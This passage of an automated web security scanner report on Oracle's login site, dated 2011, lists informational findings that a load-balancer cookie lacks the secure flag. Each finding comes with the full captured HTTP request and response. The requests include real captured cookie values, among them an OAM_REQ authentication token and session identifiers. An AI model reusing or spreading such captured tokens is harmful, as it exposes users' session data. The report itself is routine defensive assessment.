...[SNIP]...

7.23. https://login.oracle.com/mysso/sso_loginui/loginStyling.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/loginStyling.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/loginStyling.css HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 14395
Content-Type: text/css
Last-Modified: Thu, 21 Jul 2011 20:04:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBQw6uHK6EVADUS1EHWFB01t_bN
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

/* Desktop Version */
body{font-family:Arial, Helvetica, sans-serif;}
.Mwrapper{ display:none;}
.wrapper{ display:block;margin:0px auto;width:974px; }
.logo-header{float:left; width:974px; height:50px
...[SNIP]...

7.24. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/moc_lib.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/moc_lib.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 5959
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBR06uHK6EVADUS1EHWFB01t_bO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

//-- moc_lib.js: Core JS library for www.oracle.com
var ORA_UCM_INFO;


//-- Function Library

// to populate the user name -------------------------------------------------//
function PopulateLogin()
...[SNIP]...

7.25. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oracle-footer-tagline.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Accept-Ranges: bytes
Content-Length: 1711
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCTJ6uHK6EVADUS1EHWFB01t_dG
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

7.26. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oralogo_small.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 2059
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cB
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

7.27. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-l.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
